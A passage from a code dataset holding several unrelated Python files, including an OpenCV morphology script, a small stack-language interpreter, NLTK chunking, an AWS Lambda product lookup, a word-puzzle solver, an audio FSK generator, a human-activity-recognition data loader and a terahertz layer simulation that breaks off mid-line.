opened_image)\n\n# Morph Closing the images -> Good for noise reduction on images.\nmorph_closed = cv2.morphologyEx(image, cv2.MORPH_CLOSE, kernel)\ncv2.imshow(\"Morph Closed\", morph_closed)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"dialation_erosion_opening_and_closing.py","file_name":"dialation_erosion_opening_and_closing.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"71954090","text":"#!/usr/bin/env python3\n\nimport sys\nimport re\nimport collections\nimport copy\nimport time\nimport itertools\nimport numbers\nimport math\nimport random\nfrom warnings import warn\n\nIN_REPL = False\nMIDLINE = 0\nDATA = []\n\nif sys.version_info[0] < 3:\n str = basestring\n input = raw_input\nelse:\n str = str\n input = input\n\nescapes = {\n r\"\\n\": \"\\n\", r\"\\r\": \"\\r\", r\"\\a\": \"\\a\", r\"\\f\": \"\\f\",\n r\"\\t\": \"\\t\", r\"\\b\": \"\\b\", r\"\\v\": \"\\v\", r\"\\e\": \"\\x1B\",\n}\n\n\ndef escape(string):\n string = 
re.sub(r\"\\\\x[\\da-fA-F]{2}\", lambda s: chr(int(s.group(0)[2:], 16)), string)\n string = re.sub(r\"\\\\(.)\", lambda s: escapes.get(s.group(0), s.group(1)), string)\n return string\n\n\ndef to_num(string):\n string = string.replace('_', '')\n if '.' in string or 'e' in string:\n return float(string)\n elif string.startswith(\"0b\"):\n return int(string, 2)\n elif string.startswith(\"0o\"):\n return int(string, 8)\n elif string.startswith(\"0d\"):\n return int(string[2:], 10)\n elif string.startswith(\"0x\"):\n return int(string, 16)\n elif string.startswith(\"0u\") and all(c == '1' for c in string):\n return len(string[2:])\n else:\n return int(string, 10)\n\n\nREGEX_FLAGS = {\n 'x': re.X, # extended\n 'm': re.M, # multiline\n 'i': re.I, # ignore case\n 'l': re.L, # locale-dependent\n 's': re.S, # dot matches everything\n 'u': re.U, # slash classes use Unicode\n 'd': re.DEBUG, # show debug info during compilation\n}\n\n\ndef to_regex(string):\n last_pipe = string.rfind('|')\n body = escape(string[2:last_pipe])\n flags = string[last_pipe + 1:]\n if flags:\n flags = reduce(lambda m, c: m | c, map(REGEX_FLAGS.__getitem__, list(flags)), 0)\n else:\n flags = 0\n return re.compile(escape(string), flags)\n\n\nclass Word:\n \"\"\"\n An exceedingly simple wrapper class. Just needs to exist so we can safely and definitely\n distinguish between this and Strings.\n \"\"\"\n def __init__(self, name):\n self.name = name\n\n def __str__(self):\n return self.name\n\n def __repr__(self):\n return \"word:`{}`\".format(self.name)\n \n def __eq__(self, other):\n if isinstance(other, self.__class__):\n return self.name == other.name\n else:\n return False\n\n\nsearches = collections.OrderedDict([ # TODO Make OOP!\n (r'\"', [r'.(? }}\".format(len(self.words))\n\n def __repr__(self): return \"{{ {} }}\".format(' '.join(map(repr, self.words)))\n\n def typename(self): return 'block'\n\n\nsource_files = sys.argv[1:]\nif source_files:\n # if files are given, we parse the files.\n def source_func():\n for filepath in source_files:\n with open(filepath) as cur_file:\n for line in cur_file:\n yield line\nelse:\n # otherwise, we use the REPL.\n IN_REPL = True\n def source_func():\n def print_nnl(s):\n sys.stdout.write(s)\n sys.stdout.flush()\n\n print(\"Welcome to the Concaten REPL.\")\n print(\"It is currently {}\".\n format(time.strftime(\"%X, %x\")))\n while True:\n if IN_REPL and MIDLINE == 0: print(\"stack: {}\".format(', '.join(map(repr, DATA))))\n if MIDLINE > 0: print_nnl(\". 
\")\n else: print_nnl(\"> \")\n try:\n user_input = input() + '\\n'\n except KeyboardInterrupt:\n break\n yield user_input\n print(\"Goodbye!\")\n\n\ndef get_candidates(word, scopes):\n token_name = word.name\n for scope in reversed(scopes):\n if token_name in scope:\n cands = scope[token_name]\n if isinstance(cands, collections.Iterable):\n for item in cands: yield item\n else:\n yield cands\n\n\ndef get_until_matching(source, opening, closing, starts_after_first=True):\n # MIDLINE += 1\n matched_c = 1 if starts_after_first else 0\n block_contents = []\n try:\n while matched_c != 0:\n thing = next(source)\n if isinstance(thing, Word):\n name = thing.name # convert from word to string\n if name == opening:\n matched_c += 1\n if name == closing:\n matched_c -= 1\n block_contents.append(thing)\n except StopIteration:\n raise ValueError(\"Could not find matching {} for the {}\".format(closing, opening))\n # MIDLINE -= 1\n return block_contents[:-1] if starts_after_first else block_contents\n\n\ndef parse(command_stack, data_stack, word_scopes):\n command_stack = iter(command_stack)\n for token in command_stack:\n if not isinstance(token, Word):\n data_stack.append(token)\n else:\n candidates = list(get_candidates(token, word_scopes))\n if candidates:\n for candidate in candidates:\n try:\n candidate(data_stack, word_scopes)\n break\n except CTNTypeMismatch:\n pass # This error means one word failed in the expected way, and that we\n # we should continue trying other candidates.\n else:\n raise Exception(\"Could not find word `{}` with matching types\".format(token))\n else:\n token = token.name # convert from word to string\n if token == 'return':\n return\n elif token == 'stack-inspect':\n print(repr(data_stack))\n elif token == '{':\n block_contents = get_until_matching(command_stack, '{', '}')\n data_stack.append(ConcatenBlock(block_contents))\n elif token == '[':\n words = get_until_matching(command_stack, '[', ']')\n stack_c = copy.deepcopy(data_stack)\n ConcatenBlock(words)(stack_c, word_scopes)\n changed = stack_c[len(data_stack):]\n data_stack.append(changed)\n else:\n raise Exception(\"Could not find a word called {!r}\".format(token))\n \n\n\ndef __get_ctn_name(obj):\n try:\n return obj.typename()\n except:\n pyt = obj.__class__.__name__\n if pyt == 'NoneType': return 'null'\n elif pyt == 'list': return 'array'\n elif pyt == 'str': return 'string'\n elif pyt == 'long': return 'int'\n else:\n if pyt.startswith(\"Concaten\"): pyt = pyt[8:]\n elif pyt.startswith(\"CTN\"): pyt = pyt[3:]\n return pyt[0].lower() + re.sub(\"[A-Z]\", lambda s: \"-\" + s.lower(), pyt[1:])\n\n\nclass CTNTypeMismatch(TypeError):\n def __init__(self, expected, got):\n TypeError.__init__(self, \"Expected {} but got {}\".format(expected, got))\n self.expected_type = expected\n self.got_type = got\n\n\nSUPERTYPES = { # type => supertypes\n 'object': None,\n # Things subclassing `object` don't have to be explicitly added.\n}\n\n\ndef __type_matches(typename, comparing): # TODO Implement as Type class w/ matches() method\n \"\"\"\n typename is the typename's typename, comparing_to is the type to check if it matches. 
They\n difer in that if comparing_to is one of typename's superclasses, this method returns True; if\n the opposite is true, it will not look through comparing_to's superclasses.\n \"\"\"\n if typename == None: return False\n return typename == comparing or __type_matches(SUPERTYPES.get(typename, 'object'), comparing)\n\n\ndef type_match(obj, comparing_to):\n typename = __get_ctn_name(obj)\n if __type_matches(typename, comparing_to):\n return obj\n else:\n raise CTNTypeMismatch(comparing_to, typename)\n\n\nclass PyWord:\n def __init__(self, arg_types, return_types, caller, takes_word_scope=False, takes_stack=False):\n self.arg_types = arg_types\n if isinstance(return_types, str):\n self.return_types = [return_types]\n elif return_types is None:\n self.return_types = []\n else:\n self.return_types = return_types\n self.return_types.reverse()\n self.caller = caller\n self.takes_words = takes_word_scope\n self.takes_stack = takes_stack\n\n def __call__(self, stack, word_scopes):\n stack_c = copy.deepcopy(stack)\n # TODO This should be extracted to its own function so we can do cool shit like\n # ` stack` and ` optional`.\n arg_types = self.arg_types[0:]\n arg_types.reverse()\n args = [type_match(stack_c.pop(), typename) for typename in arg_types]\n del stack[-len(args):]\n passing = [args]\n if self.takes_words: passing.append(word_scopes)\n if self.takes_stack: passing.append(stack)\n res = self.caller(*passing)\n if res is not None:\n if isinstance(res, collections.Iterable) and not isinstance(res, str):\n stack.extend(res)\n else:\n stack.append(res)\n\n def __repr__(self):\n return \"builtin[{}>{}]({},{})\".format(','.join(self.arg_types),','.join(self.return_types),\n self.takes_words, self.takes_stack)\n\n\n# Because even with from __future__ import print_function, `print` still doesn't work.\n# `lambda s: print(s)` also doesn't work (**with** that import), because... 
reasons?\n# Why the hell is Python so inconsistent?!\ndef puts(args): print(str(args.pop()))\n#TODO: http://ruby-doc.org/core-2.3.0/IO.html#method-i-gets\ndef gets(): return input()\ndef ctn_print(args):\n sys.stdout.write(args[0])\n sys.stdout.flush()\ndef p(args):\n thing = args.pop()\n print(repr(thing))\n return thing\ndef rotate(stack, words):\n n = stack.pop()\n if not isinstance(n, numbers.Number) or isinstance(n, bool): raise CTNTypeError()\n top_n = stack[-n:]\n del stack[-n:]\n stack.extend(top_n[1:])\n stack.append(top_n[0])\ndef repeat(obj, n):\n l = round(n * len(obj))\n return (obj * math.ceil(n))[:l + 1]\ndef clear_stack(stack, __):\n del stack[:]\n\nGLOBALS = {\n 'true': lambda stack, __: stack.append(True),\n 'false': lambda stack, __: stack.append(False),\n 'null': lambda stack, __: stack.append(None),\n \n 'puts': PyWord(['object'], None, lambda args: print(str(args[0]))),\n 'gets': PyWord([], 'string', gets),\n 'print': PyWord(['object'], None, lambda args: print(repr(args[0]), end='')),\n 'p': PyWord(['object'], ['object'], lambda thing: print(thing) or thing),\n 'title': ConcatenBlock([\"\\x1b]0;\", Word('swap'), Word('+'), \"\\x07\", Word('+'), Word('puts')]),\n \n '+': [\n PyWord(['int', 'int'], 'int', lambda args: args[0] + args[1]),\n # The args for this one are reversed because it attaches the first to the end of the second\n PyWord(['string', 'string'], 'string', lambda args: args[1] + args[0]),\n ],\n '-': PyWord(['int', 'int'], 'int', lambda args: args[0] - args[1]),\n '*': [\n PyWord(['array', 'int'], 'array', lambda args: [args[0] * args[1]]), # [] prevents expansion\n PyWord(['string', 'int'], 'string', lambda args: args[0] * args[1]),\n PyWord(['array', 'float'], 'array', lambda args: [repeat(args[0], args[1])]),\n PyWord(['string', 'float'], 'string', lambda args: repeat(args[0], args[1])),\n PyWord(['int', 'int'], 'int', lambda args: args[0] * args[1]),\n PyWord(['float', 'float'], 'float', lambda args: args[0] * args[1]),\n ],\n '/': PyWord(['int', 'int'], 'int', lambda args: args[0] / args[1]),\n '^': PyWord(['int', 'int'], 'int', lambda args: args[0] ** args[1]),\n \n '==': [\n PyWord(['object', 'object'], 'bool', lambda args: args[0] == args[1]),\n ],\n \n \n 'call': PyWord(['block'], None, lambda a, words, stack: a[0](stack, words+[{}]), True, True),\n 'inline-call': PyWord(['block'], None, lambda a, words, stack: a[0](stack, words), True, True),\n \n 'dup': PyWord(['object'], ['object', 'object'], lambda args: args * 2),\n # Works because args are given in opposite order of stack (same order as args)\n 'swap': PyWord(['object', 'object'], ['object', 'object'], lambda args: args),\n 'rot': rotate,\n 'drop': PyWord(['object'], None, lambda args: None),\n 'clear-stack': lambda stack, _: stack.clear(),\n\n 'rand': [\n PyWord(['int'], None, lambda args: random.randint(0, args[0] - 1)),\n # The or is for multiple statements in a lambda.\n # Since print always returns None (falsy), the right is always interpreted\n # Note: this is valid syntax\n PyWord([], None, lambda args: random.random())\n ],\n\n 'quit': PyWord([], None, lambda args: sys.exit(0)),\n 'exit': PyWord(['int'], None, lambda args: sys.exit(args[0])),\n 'abort': [\n PyWord(['string'], None, lambda args: print(args[0]) or sys.exit(0)),\n # The or is for multiple statements in a lambda.\n # Since print always returns None (falsy), the right is always interpreted\n # Note: this is valid syntax\n PyWord([], None, lambda args: sys.exit(0))\n ]\n}\nparse(tokenize(source_func()), DATA, 
parse(tokenize(source_func()), DATA, [GLOBALS])\n","sub_path":"concaten.py","file_name":"concaten.py","file_ext":"py","file_size_in_byte":15093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"455261164","text":"#chunking\n\nfrom nltk import word_tokenize\nfrom nltk import pos_tag\nfrom nltk import ne_chunk\n\nbarack = \"Barack Hussein Obama II (born August 4, 1961) is an American politician who served as the 44th President of the\" \\\n \" United States from 2009 to 2017. A member of the Democratic Party, he was the first African American to be elected \" \\\n \"to the presidency and previously served as a United States Senator from Illinois (2005–2008)\"\n\ntokenised_barack = word_tokenize(barack)\npos_list = pos_tag(tokenised_barack)\nprint(ne_chunk(pos_list))\n\nprint(\"________________________RegexParser__________________________\")\n# RegexpParser: much better than the default ne_chunk\n\nfrom nltk import RegexpParser\n\n# NOTE: the POS tags inside the braces did not survive extraction; the chunk\n# patterns below are plausible reconstructions, not the original ones.\ngrammar = r\"\"\"Place:{<NNP>+}\nDate:{<NNP><CD><,><CD>}\nPerson:{<NNP><NNP>}\n\"\"\"\n\nregParser = RegexpParser(grammar)\nreg_lines = regParser.parse(pos_list)\nprint(reg_lines)\n","sub_path":"pos_tag.py","file_name":"pos_tag.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"323929725","text":"import json\nimport boto3\n\n\nclass ProductHandler:\n def handler(self) -> dict:\n try:\n products = self.get_products()\n\n return {\"statusCode\": 200, \"body\": json.dumps(products)}\n except Exception:\n return {\"statusCode\": 500, \"body\": \"Internal Server Error\"}\n\n def get_products(self) -> list:\n try:\n dynamodb = boto3.resource(\"dynamodb\")\n table = dynamodb.Table(\"ProductCatalog\")\n\n response = table.scan()\n return response.get(\"Items\", [])\n\n except Exception as ex:\n print(ex)\n raise ex\n\n\ndef lambda_handler(event, context):\n productHandler = ProductHandler()\n return productHandler.handler()\n","sub_path":"instructions/original_lambdas/api/get_products.py","file_name":"get_products.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"44069964","text":"\ndef solution(strs, t):\n # BFS over ways to build t by concatenating words from strs; returns the\n # minimum number of words needed, or -1 if t cannot be built.\n answer = []\n queue = []\n for s in strs:\n if t.startswith(s):\n queue.append([1, s])\n \n while len(queue):\n level, accum = queue.pop(0)\n if accum == t:\n answer.append(level)\n break\n else:\n for s in strs:\n remain = t[len(accum):]\n if remain.startswith(s):\n queue.append([level+1, accum+s])\n if len(answer):\n return min(answer)\n else:\n return -1\n \n ","sub_path":"2017_tipstown/wordpuzzle2.py","file_name":"wordpuzzle2.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"231411225","text":"#!/usr/bin/env python3\nfrom const import *\n\n#---------------------------------------\nclass krl_gen(object):\n\n def __audio_callback(self, indata, outdata, frames, time, status):\n \"\"\"callback function\"\"\"\n if status:\n print(status, file=sys.stderr)\n\n#-- write the generated samples to the audio output ------------------------\n t = (self.start_idx + np.arange(frames)) / (sd.default.samplerate)\n t = t.reshape(-1, 1)\n\n if self.channel == \"left\" or self.channel == \"both\":\n A_l = 1\n else:\n A_l = 0\n if self.channel == \"right\" or self.channel == \"both\":\n A_r = 1\n else:\n A_r = 0\n
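 # The loop below implements simple binary FSK (my reading of the +/- fdev\n # logic): each bit of the 8-bit self.code keys one of two tones,\n #   bit 1 -> frequency + krl_fdev,   bit 0 -> frequency - krl_fdev,\n # and count_krl advances num_bit to the next bit every 1/krl_speed seconds.\n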
\n data_left = np.zeros(len(t))\n data_right = np.zeros(len(t))\n\n for i in range(len(t)):\n if self.data_in[self.num_bit] == 1:\n f_cur = self.frequency + self.krl_fdev\n else:\n f_cur = self.frequency - self.krl_fdev\n data_left[i] = (A_l * self.amplitude*np.sin(2*np.pi*f_cur*t[i]))\n data_right[i] = (A_r * self.amplitude*np.sin(2*np.pi*f_cur*t[i]))\n\n self.count_krl += 1.0/self.fs\n if self.count_krl >= 1.0/self.krl_speed:\n self.count_krl = 0\n self.num_bit += 1\n if self.num_bit > 7:\n self.num_bit = 0\n for j in range(7, -1, -1):\n self.data_in[j] = ((self.code & 1<<j)>>j) # extract bit j of the code\n\n data_stereo = np.column_stack([data_left, data_right])\n outdata[::] = data_stereo\n self.start_idx += frames\n\n#-- capture the incoming stream from the microphone input ------------------\n self.q.put(indata[::self.downsample, self.mapping])\n\n def __init__(self):\n \"\"\"Class initialization\"\"\"\n self.start_idx = 0\n self.downsample = 2\n self.fs = fs\n self.channel = \"both\"\n self.data_in = np.zeros(8)\n self.frequency = 475\n self.krl_fdev = 11\n self.krl_speed = data_rate\n self.code = 0x00\n self.num_bit = 0\n self.count_krl = 0\n self.channels = [1,2]\n self.amplitude = 0.1\n self.q = queue.Queue()\n sd.default.blocksize = 0\n sd.default.samplerate = self.fs\n sd.default.channels = 2\n self.stream = sd.Stream(device = (sd.default.device, sd.default.device),\\\n callback = self.__audio_callback)\n self.mapping = [c - 1 for c in self.channels]\n for j in range(7, -1, -1):\n self.data_in[j] = ((self.code & 1<<j)>>j) # extract bit j of the code\n\n","sub_path":"krl.py","file_name":"krl.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"605242029","text":"import os, requests, zipfile, io\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nfrom sklearn.tree import DecisionTreeClassifier as cart, export_graphviz\nimport graphviz\nimport pydotplus\n\n\nif not os.path.isdir('./UCI HAR Dataset/'):\n HAR_URL = 'https://archive.ics.uci.edu/ml/machine-learning-databases/00240/UCI%20HAR%20Dataset.zip'\n req = requests.get(HAR_URL)\n compressed = zipfile.ZipFile(io.BytesIO(req.content))\n compressed.extractall()\n \n\ndef get_key_value_pairs(filename):\n '''Returns the key value pairs, separated by whitespaces,\n that are stored in a file.'''\n \n with open(filename, 'r') as file:\n for line in file.readlines():\n key, value = line.strip().split(' ')\n yield key, value\n\n \ndef print_accuracy(y_true, y_pred):\n print('Accuracy: {}'\n .format(np.round(accuracy_score(y_true=y_true, y_pred=y_pred, normalize=True), 4)))\n \n \ndef print_tree_graph(tree_model, features, activity, sel_feat):\n dot_data = export_graphviz(tree_model, out_file=None, \n feature_names=[features[el] for el in sel_feat], \n class_names=[activity[str(el)] for el in [1,2,3,4,5,6]]\n )\n return pydotplus.graph_from_dot_data(dot_data) \n\n\ndef compute_disjunctive_random_splits(x_sample, y_sample, splits):\n shuffled_dataset = x_sample.sample(frac=1, random_state=8)\n shuffled_splits = np.array_split(shuffled_dataset, splits)\n masks = []\n for mask in range(0, splits):\n test_x = shuffled_splits[mask]\n train_x = x_sample[x_sample.index.isin(test_x.index) == False]\n test_y = y_sample.loc[shuffled_splits[mask].index]\n train_y = y_sample.loc[train_x.index]\n #\n masks.append([train_x, test_x, train_y, test_y])\n \n return masks\n \n \n\n \nactivity = {key: value for key, value in get_key_value_pairs('./UCI HAR Dataset/activity_labels.txt')}\nfeatures 
= [line.strip().split(' ')[1] for line in open('./UCI HAR Dataset/features.txt', 'r')]\n\nXtrain = pd.read_table('./UCI HAR Dataset/train/X_train.txt', header=None, delim_whitespace=True, names=features)\nXtrain['subject'] = [line.strip() for line in open('./UCI HAR Dataset/train/subject_train.txt','r')]\nXtrain['activity'] = pd.read_table('./UCI HAR Dataset/train/y_train.txt', header=None, delim_whitespace=True)\n","sub_path":"cross_functions.py","file_name":"cross_functions.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"266438857","text":"from TDSA import *\nfrom resolution_limit_ref_sim import sim_refs\n\n\ndeg_in = 0 # incidence angle in degrees\nsnell_sin = n_air * sin(deg_in * pi / 180)\n# n_subs = 1.17 - 0.0 * 1j # substrate refractive index -- cork\nn_subs = 1e20 - 0.0 * 1j # substrate refractive index -- metal\n\n\n# function definitions\ndef theta(n):\n return arcsin(snell_sin / real(n))\n\n\ndef ct2(n_l, n_l_1):\n n_l *= cos(theta(n_l))\n n_l_1 *= cos(theta(n_l_1))\n return 4 * n_l * n_l_1 / (n_l + n_l_1)**2\n\n\ndef cr_l_1_l(n_l, n_l_1): # from n_l-1 to n_l\n n_l_1 *= cos(theta(n_l_1))\n n_l *= cos(theta(n_l))\n return (n_l_1 - n_l) / (n_l_1 + n_l)\n\n\ndef phase_factor(n, k, thick, freq): # theta in radians\n omg = 2 * pi * freq\n thick *= cos(theta(n))\n phi = 2 * omg * thick / c_0\n return exp(- 1j * n * phi) * exp(- k * phi)\n\n\ndef epsilon(e_s, e_inf, tau, freq): # Debye model\n omg = 2 * pi * freq\n e_w = e_inf + (e_s - e_inf) / (1 + 1j * omg * tau)\n return e_w\n\n\ndef nk_from_eps(e_s, e_inf, tau, freq):\n e_w = epsilon(e_s, e_inf, tau, freq)\n n = sqrt((abs(e_w) + real(e_w)) / 2)\n k = sqrt((abs(e_w) - real(e_w)) / 2)\n return n, k\n\n\ndef H_sim(freq, n_i, k_i, thick_i, n_o, k_o, thick_o, d_air):\n \n H_i = cr_l_1_l(n_subs, n_i - 1j * k_i)\n \n rlm1l = cr_l_1_l(n_i - 1j * k_i, n_o - 1j * k_o)\n tt = ct2(n_i - 1j * k_i, n_o - 1j * k_o)\n exp_phi = phase_factor(n_i, k_i, thick_i, freq)\n \n H_i = rlm1l + (tt * H_i * exp_phi) / (1 + rlm1l * H_i * exp_phi)\n\n rlm1l = cr_l_1_l(n_o - 1j * k_o, n_air_cplx)\n tt = ct2(n_o - 1j * k_o, n_air_cplx)\n exp_phi = phase_factor(n_o, k_o, thick_o, freq)\n\n H_i = rlm1l + (tt * H_i * exp_phi) / (1 + rlm1l * H_i * exp_phi)\n \n return exp(- 1j * 2 * 2 * pi * freq * d_air / c_0) * H_i\n\n\ndef cost_function(params, *args):\n d_air, e_s_i, e_inf_i, tau_i, thick_i, e_s_o, e_inf_o, tau_o, thick_o = params\n E_sam, E_ref_w, freqs = args\n n_i, k_i = nk_from_eps(e_s_i, e_inf_i, tau_i, freqs) # debye model\n n_o, k_o = nk_from_eps(e_s_o, e_inf_o, tau_o, freqs) # debye model\n H_teo = H_sim(freqs, n_i, k_i, thick_i, n_o, k_o, thick_o, d_air)\n E_teo = irfft(H_teo * E_ref_w)\n return sum((E_sam - E_teo)**2)\n\n\ndef sim_traces(working_dir, e_s_sim_i, e_inf_sim_i, tau_sim_i,\n e_s_sim_o, e_inf_sim_o, tau_sim_o):\n t0 = time_ns()\n # out_dir = './output/traces/'\n # in_dir = './output/refs/'\n out_dir = './output/simulation_results/' + working_dir + '/traces/'\n in_dir = './output/simulation_results/' + working_dir + '/refs/'\n ref_list = os.listdir(in_dir)\n working_dir = './output/simulation_results/' + working_dir + '/'\n if not os.path.isdir(working_dir):\n os.mkdir(working_dir)\n if not os.path.isdir(out_dir):\n os.mkdir(out_dir)\n for trash_file in os.listdir(out_dir):\n os.remove(out_dir + trash_file)\n\n for ref_file in ref_list:\n t_ref, E_ref = read_1file(in_dir + ref_file) # t_ref in ps\n f_ref, E_ref_w = fourier_analysis(t_ref, 
E_ref) # f_ref in THz\n\n t_ref *= 1e-12 # t_ref in s\n f_ref *= 1e12 # f_ref in Hz\n\n ns_level = ref_file.split('_')[0]\n\n # material data\n # e_s_sim_i = 1.5**2\n # e_inf_sim_i = 1.7**2\n # tau_sim_i = 1e-13\n e_s_sim_i = e_s_sim_i ** 2\n e_inf_sim_i = e_inf_sim_i ** 2\n n_sim_i, k_sim_i = nk_from_eps(e_s_sim_i, e_inf_sim_i, tau_sim_i, f_ref)\n # e_s_sim_o = 1.5**2\n # e_inf_sim_o = 1.7**2\n # tau_sim_o = 1e-13\n e_s_sim_o = e_s_sim_o ** 2\n e_inf_sim_o = e_inf_sim_o ** 2\n n_sim_o, k_sim_o = nk_from_eps(e_s_sim_o, e_inf_sim_o, tau_sim_o, f_ref)\n\n f_15_idx = where(f_ref <= 1.5e12)[0][-1] # f index at 1.5 THz\n print('disp_i =', abs(n_sim_i[0] - n_sim_i[f_15_idx]) / 1.5)\n print('disp_o =', abs(n_sim_o[0] - n_sim_o[f_15_idx]) / 1.5)\n\n print('contr_im =', abs(n_sim_i[0] - n_sim_o[0]))\n\n # quit()\n\n # # internal layer\n # f_ref *= 1e-12\n # f_aux, n_aux = read_1file('./output/materials/n_Loctite_480.csv')\n # f_aux2, alpha_aux = read_1file('./output/materials/alpha_Loctite_480.csv')\n # n_interp = interp1d(f_aux, n_aux, bounds_error=False, fill_value=(n_aux[0], n_aux[-1]))\n # alpha_interp = interp1d(f_aux2, alpha_aux, bounds_error=False, fill_value=(n_aux[0], n_aux[-1]))\n # n_sim_i = n_interp(f_ref)\n # k_sim_i = alpha_interp(f_ref) * c_0 / (4 * pi * f_ref * 1e10)\n # # mid layer\n # f_aux, n_aux = read_1file('./output/materials/n_Loctite_3295.csv')\n # f_aux2, alpha_aux = read_1file('./output/materials/alpha_Loctite_3295.csv')\n # n_interp = interp1d(f_aux, n_aux, bounds_error=False, fill_value=(n_aux[0], n_aux[-1]))\n # alpha_interp = interp1d(f_aux2, alpha_aux, bounds_error=False, fill_value=(n_aux[0], n_aux[-1]))\n # n_sim_o = n_interp(f_ref)\n # k_sim_o = alpha_interp(f_ref) * c_0 / (4 * pi * f_ref * 1e10)\n # # outer layer\n # f_aux, n_aux = read_1file('./output/materials/n_Teromix_6700.csv')\n # f_aux2, alpha_aux = read_1file('./output/materials/alpha_Teromix_6700.csv')\n # n_interp = interp1d(f_aux, n_aux, bounds_error=False, fill_value=(n_aux[0], n_aux[-1]))\n # alpha_interp = interp1d(f_aux2, alpha_aux, bounds_error=False, fill_value=(n_aux[0], n_aux[-1]))\n # n_sim_o = n_interp(f_ref)\n # k_sim_o = alpha_interp(f_ref) * c_0 / (4 * pi * f_ref * 1e10)\n # # show()\n # # quit()\n # f_ref *= 1e12\n\n # e_s_sim_i = 1.55 ** 2\n # e_inf_sim_i = 1.55 ** 2\n # tau_sim_i = 1e-14\n # n_sim_i, k_sim_i = nk_from_eps(e_s_sim_i, e_inf_sim_i, tau_sim_i, f_ref)\n # e_s_sim_m = 1.56 ** 2\n # e_inf_sim_m = 1.56 ** 2\n # tau_sim_m = 1e-14\n # n_sim_m, k_sim_m = nk_from_eps(e_s_sim_m, e_inf_sim_m, tau_sim_m, f_ref)\n # e_s_sim_o = 1.55 ** 2\n # e_inf_sim_o = 1.55 ** 2\n # tau_sim_o = 1e-14\n # n_sim_o, k_sim_o = nk_from_eps(e_s_sim_o, e_inf_sim_o, tau_sim_o, f_ref)\n\n # material data 2.0\n # figure()\n # n_aux = ones(f_ref.size)\n # k_aux = arange(f_ref.size) / f_ref.size\n # plot(f_ref, k_aux)\n # show()\n # quit()\n\n f_min_idx, f_max_idx = f_min_max_idx(f_ref, 0, 1)\n f_ref *= 1e-12 # THz\n figure()\n plot(f_ref, n_sim_i, label='inner')\n plot(f_ref, n_sim_o, label='outer')\n xlabel(r'$f\\ (THz)$')\n # xlim([f_ref[f_min_idx], f_ref[f_max_idx]])\n # ylim([0.9 * n_sim[f_min_idx], 1.1 * n_sim[f_max_idx]])\n legend()\n savefig(working_dir + '/n_sim.png')\n close()\n\n figure()\n plot(f_ref, k_sim_i, label='inner')\n plot(f_ref, k_sim_o, label='outer')\n xlabel(r'$f\\ (THz)$')\n # xlim([f_ref[f_min_idx], f_ref[f_max_idx]])\n # ylim([k_sim[f_min_idx], k_sim[f_max_idx]])\n legend()\n savefig(working_dir + '/k_sim.png')\n # show()\n # quit()\n close()\n\n # plot(t_ref*1e12, - E_ref, 
label='ref')\n\n # plot(f_ref*1e12, unwrap(angle(E_ref_w)), label='ref')\n # for d_mat in [0.1, 0.2, 0.3, 0.4, 0.5]:\n # for d_mat in [1, 2, 3, 4, 5]:\n # for d_mat in [10, 20, 30, 40, 50]\n # for d_mat in [100, 200, 300, 400, 500]:\n # for d_mat in [0.1, 0.2, 0.3, 0.4, 0.5, 1, 2, 3, 4, 5, 10, 20, 30, 40, 50, 100, 200, 300, 400, 500]:\n # for d_mat in [0.1, 0.5, 1, 5, 10, 50, 100, 500]:\n # for d_mat in [0.001, 0.005, 0.01, 0.05, 0.1, 0.5, 1, 5, 10, 50, 100]:\n # for d_mat in [1e-4, 1e-3, 1e-2, 1e-1, 1, 1e2, 1e3, 1.1e3]:\n # for d_mat in [1e-4, 1e-3, 1e-2, 1e-1, 1, 1e2, 1e3]:\n # for d_mat in [1e-1, 1e-0.75, 1e-0.5, 1e-0.25, 1e0, 1e0.25, 1e0.5, 1e, 0.2, 0.3, 0.4, 0.5, 1, 2, 3, 4, 5, 10, 20, 30, 40, 50, 100, 200, 300, 400, 500]:\n # for d_mat in [0.1, 0.2, 0.3, 0.4, 0.5, 1, 2, 3, 4, 5, 10, 20, 30, 40, 50, 100, 200, 300, 400, 500]:\n # for d_mat in [0.01, 10**-1.5, 0.1, 10**-0.5, 1, 10**0.5, 10, 10**1.5, 100, 10**2.5]:\n\n f_ref *= 1e12 # Hz\n for d_mat in pow(10, arange(-1, 3, 1 / 3)): # 1/3\n\n print()\n print('Simulating for', d_mat, 'um')\n name_trace = str(d_mat).zfill(6) + '_'\n name_trace = name_trace + str(e_s_sim_i) + '_' + str(e_inf_sim_i) + '_' + str(tau_sim_i) + '_'\n name_trace = name_trace + str(e_s_sim_o) + '_' + str(e_inf_sim_o) + '_' + str(tau_sim_o) + '_'\n name_trace = name_trace + ns_level + '.txt'\n\n d_mat *= 1e-6 # um\n\n H_sim_teo = H_sim(f_ref, n_sim_i, k_sim_i, d_mat, n_sim_o, k_sim_o, d_mat,\n 0) # - d_mat)\n # plot(f_ref, unwrap(angle(H_sim_teo)))\n # show()\n # quit()\n E_sim_w = H_sim_teo * E_ref_w\n E_sim = irfft(E_sim_w)\n # plot(t_ref*1e12, E_sim, label=round(d_mat*1e6, 1))\n # plot(f_ref, unwrap(angle(E_sim_w)), label=round(d_mat * 1e6, 1))\n\n print('Saving trace as', name_trace)\n tw = open(out_dir + name_trace, 'w')\n for i in range(E_sim.size):\n tw.write(str(t_ref[i] * 1e12) + ',' + str(E_sim[i]) + '\\n')\n tw.close()\n # legend()\n # show()\n\n\nsim_h = open('./output/sims.txt')\nfor line in sim_h:\n wk_dir, e_s_i, e_inf_i, tau_i, e_s_o, e_inf_o, tau_o = 